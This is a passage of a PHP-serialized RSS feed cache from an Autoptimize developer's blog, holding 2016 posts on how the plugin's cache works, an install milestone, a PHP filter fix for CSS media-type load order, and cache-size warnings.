alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:36:"So how does Autoptimize work anyway?";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/v3VLBgfa58A/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Nov 2016 17:48:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"how autoptimize works";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10423";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:332:"A question that has come up a couple of times already is how Autoptimize and it&#8217;s cache work. So let&#8217;s do some copy/pasting of what I replied earlier on the wordpress.org support forum; AO intercepts the HTML created by WordPress for a request (using the output buffer) all references to JS (and CSS) are extracted [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2915:"<p>A question that has come up a couple of times already is how Autoptimize and it&#8217;s cache work. So let&#8217;s do some copy/pasting of what I <a href="https://wordpress.org/support/topic/what-is-considered-a-huge-cache/#post-8413510">replied earlier on the wordpress.org support forum</a>;</p>\n<ol>\n<li>AO <strong>intercepts the HTML</strong> created by WordPress for a request (using the output buffer)</li>\n<li>all <strong>references to JS (and CSS) are extracted</strong> from the HTML</li>\n<li>all original <strong>references</strong> to JS (and CSS) are <strong>removed</strong> from the HTML (the code in the original files is left as is, AO never changes those files)</li>\n<li>all JS (and CSS) is <strong>aggregated</strong> (JS in one string, CSS in as many strings as there were media types)</li>\n<li>the <strong>md5-hash</strong> (mathematical/ cryptographic function that generates a quasi-unique string based on another string) of the aggregated JS (and CSS) is calculated</li>\n<li>using the md5 AO <strong>checks if a cached file with that md5 exists</strong> and if so continues to step 8</li>\n<li>if <strong>no cached file</strong> is found, the JS (and CSS) is <strong>minified and cached in a new file</strong>, with the md5 as part of the filename</li>\n<li>the <strong>links</strong> to the autoptimized JS (and CSS) file in cache are <strong>injected in the HTML</strong></li>\n<li>the <strong>HTML is minified</strong> (but not cached in Autoptimize)</li>\n<li>the <strong>HTML is returned to WordPress</strong> (where it can be cached by a page cache and sent to the visitor)</li>\n</ol>\n<p>This is especially interesting if you want to understand why the cache size can &#8220;explode&#8221;; if in step 4 the code is even a bit different from previous requests, the md5-hash in step 5 will be different so the file will not be found in cache (step 6) and the code will be re-minified (which is relatively expensive) and cached (step 7).</p>\n<p>And that, my friends, is how Autoptimize works.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n<li><a href="http://blog.futtta.be/2013/04/01/easter-bunny-special-autoptimize-1-6-0/" rel="bookmark" title="Easter Bunny special: Autoptimize 1.6.0">Easter Bunny special: Autoptimize 1.6.0 </a></li>\n<li><a href="http://blog.futtta.be/2015/12/09/bringing-autoptimize-2-0-beta-to-a-christmas-tree-near-you/" rel="bookmark" title="Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you">Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/v3VLBgfa58A" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"4";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:54:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:45:"More than 200000 active Autoptimize installs!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/zirvZBKqhD4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 14 Oct 2016 07:45:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:5:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:12:"plugin stats";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"w00t";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10409";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:83:"Today Autoptimize officially passed the threshold of 200000 active installs. w00t!!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1525:"<p>Today <a href="https://wordpress.org/plugins/autoptimize/stats/">Autoptimize</a> officially passed the threshold of 200000 active installs. w00t!!</p>\n<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1.png"><img class="alignleft size-medium wp-image-10413" src="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-300x255.png" alt="ao_200k" width="300" height="255" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-300x255.png 300w, http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-624x529.png 624w, http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1.png 772w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/09/16/100k-active-autoptimize-installs-thanks/" rel="bookmark" title="100k active Autoptimize installs. Thanks!">100k active Autoptimize installs. Thanks! </a></li>\n<li><a href="http://blog.futtta.be/2013/12/09/blank-yoast-seo-sitemaps-no-more/" rel="bookmark" title="Blank Yoast SEO sitemaps no more!">Blank Yoast SEO sitemaps no more! </a></li>\n<li><a href="http://blog.futtta.be/2014/09/10/wp-seo-vs-autoptimize-who-broke-your-wordpress/" rel="bookmark" title="WP SEO vs Autoptimize; who broke your WordPress?">WP SEO vs Autoptimize; who broke your WordPress? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/zirvZBKqhD4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:73:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:63:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"How to fix CSS media-types impacting Autoptimized CSS order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/In1_tZ-xwCE/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:102:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 04 Oct 2016 13:05:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:8:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:14:"css load order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"css mediatype";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:4:"okab";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:9:"pixeldima";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10394";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:318:"Adel of Pixeldima contacted me to look into a problem with some of the styles not being applied after autoptimization on the forum-page in his beautiful OKAB-theme. I had seen similar problems before, but decided to dig in this time to understand the root cause. That root cause turned out to be 2 CSS-files, one [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:5514:"<p><a href="https://themeforest.net/item/okab-responsive-multipurpose-wordpress-theme/16958600"><img class="alignright size-medium wp-image-10405" src="http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-300x179.png" alt="pixeldima-forum-screenshot" width="300" height="179" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-300x179.png 300w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-1024x612.png 1024w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-624x373.png 624w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot.png 1221w" sizes="(max-width: 300px) 100vw, 300px" /></a>Adel of <a href="http://pixeldima.com/">Pixeldima</a> contacted me to look into a problem with <strong>some of the styles not being applied after autoptimization</strong> on <a href="http://pixeldima.com/forums/">the forum-page</a> in his beautiful <a href="https://themeforest.net/item/okab-responsive-multipurpose-wordpress-theme/16958600">OKAB-theme</a>. I had seen similar problems before, but decided to dig in this time to understand the root cause. That root cause turned out to be <strong>2 CSS-files</strong>, one overriding the style of the other, having a different <strong>media-type</strong>, which <strong>messed up the load order</strong> once autoptimized. This <strong>can</strong> either <strong>be fixed</strong> at the theme-level, at AO configuration level or with a couple of lines of code hooking into AO&#8217;s API.</p>\n<h1>The problem</h1>\n<p>Without Autoptimize (which one can trigger by simply adding <em>?ao_noptimize=1</em> to the URL), these 2 relevant files were loaded (among many others obviously):</p>\n<ul>\n<li>bbpress.css (the default bbpress css-file) was loaded first with media=&#8221;screen&#8221;</li>\n<li>okab/bbpress-styles.css (part of the theme) is loaded second with media=&#8221;all&#8221;, overriding some of the CSS in bbpress.css</li>\n</ul>\n<p>Autoptimize honors the media-types, resulting in 2 Autoptimized CSS-files;</p>\n<ul>\n<li>autoptimize_1a002577cefe349767025a16201f37a9.css with <strong>media=&#8221;all&#8221;</strong> is loaded first (because the very first CSS-file encountered in the HTML had media=&#8221;all&#8221;) which contains okab/bbpress-styles.css</li>\n<li>autoptimize_8e3c7dac90177214b6583286ddaa141f.css is loaded second with <strong>media=&#8221;screen&#8221;</strong>, containing bbpress.css</li>\n</ul>\n<p>So due to the mediatype the code in bbpress-styles.css was loaded before the CSS in bbpress.css when Autoptimized, resulting in styles being overwritten the wrong way (bbpress-styles.css is overwritten by bbpress.css instead of the other way around).</p>\n<h1>The solution(s)</h1>\n<p>As Adel was the theme developer, he could immediately <strong>attack the root issue by enqueuing bbpress-styles.css with media=&#8221;screen&#8221;</strong>. This way both files share the same media-type and go in the same autoptimized CSS-file, resulting in the CSS of bbpress.css getting properly overwritten by the CSS of okab/bbpress-styles.css.</p>\n<p>If you&#8217;re not the theme developer you&#8217;ll probably not want to change the theme&#8217;s code (although you could dequeue and re-enqueue in a child-theme&#8217;s functions.php), in which case you have two workarounds at your disposal: the <strong>easiest workaround</strong> being simply <strong>excluding the CSS-file that gets overwritten from CSS optimization </strong>(i.e. in this case simply adding okab/bbpress-style.css to the list of CSS optimization exclusions). Easy indeed, but on the downside you&#8217;ll have one non-optimized CSS-file. That&#8217;s why it&#8217;s a good thing we have <strong>our precious little API</strong>, allowing us <strong>to override the media-type of the offending file</strong> with just a couple of lines of code, like this;</p>\n<pre class="brush: php; title: ; notranslate">add_filter(\'autoptimize_filter_css_tagmedia\',\'check_mediatype\',10,2);\nfunction check_mediatype($media,$tag) {\n  if ( strpos($tag,&quot;okab/bbpress-styles.css&quot;) !== false ) {\n	$media=array(&quot;screen&quot;);\n  }\n  return $media;\n}</pre>\n<h1>Conclusion</h1>\n<p>As <strong>Autoptimize honors the original CSS&#8217;s media-types</strong>, 2 <strong>CSS-files</strong> that ought to be loaded in a specific order <strong>might end up being loaded in the wrong order if their media-type is different</strong>. This <strong>can be fixed</strong> in the theme or worked around by excluding a specific CSS-file or using AO&#8217;s API to override the media-type for the offending CSS-file.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2014/12/24/autoptimize-minor-update/" rel="bookmark" title="Autoptimize minor update and beyond">Autoptimize minor update and beyond </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2015/08/07/why-autoptimize-doesnt-touch-non-local-cssjs/" rel="bookmark" title="Why Autoptimize doesn&#8217;t touch non-local CSS/JS">Why Autoptimize doesn&#8217;t touch non-local CSS/JS </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/In1_tZ-xwCE" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:98:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:51:"Autoptimize cache size: the canary in the coal mine";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/NcmcF0UfG5s/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 15 Sep 2016 16:11:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"rants & raves";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:5:"alert";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:10:"auto-purge";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:5:"cache";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:10:"cache size";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:4:"cron";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10386";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:360:"Copy/ pasted straight from a support question on wordpress.org; Auto-deleting the cache would only solve one problem you&#8217;re having (disk space), but there are 2 other problems -which I consider more important- that auto-cleaning can never solve: 1. you will be generating new autoptimized JS very regularly, which slows your site down for users who [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2438:"<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine.jpg"><img class="alignright size-medium wp-image-10390" src="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine-300x224.jpg" alt="another-canary-in-a-coal-mine" width="300" height="224" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine-300x224.jpg 300w, http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine.jpg 450w" sizes="(max-width: 300px) 100vw, 300px" /></a>Copy/ pasted straight from <a href="https://wordpress.org/support/topic/auto-delete-cache/">a support question on wordpress.org</a>;</p>\n<blockquote><p>Auto-deleting the cache would only solve one problem you&#8217;re having (disk space), but there are 2 other problems -which I consider more important- that auto-cleaning can never solve:<br />\n1. you will be generating new autoptimized JS very regularly, which slows your site down for users who happen to be the unlucky ones requesting that page<br />\n2. a visitor going from page X to page Y will very likely have to request a different autoptimized JS file for page Y instead of using the one from page X from cache, again slowing your site down</p>\n<p>So I actually consider the cache-size warning like a <a href="https://en.wiktionary.org/wiki/canary_in_a_coal_mine">canary in the coal mines</a>; if the canary dies, you know there&#8217;s a bigger problem.</p>\n<p>You don&#8217;t (or shouldn&#8217;t) really want me to take away the canary! :)</p></blockquote>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/08/19/it-feels-great-to-see-ones-children-going-places/" rel="bookmark" title="It feels great to see ones children going places!">It feels great to see ones children going places! </a></li>\n<li><a 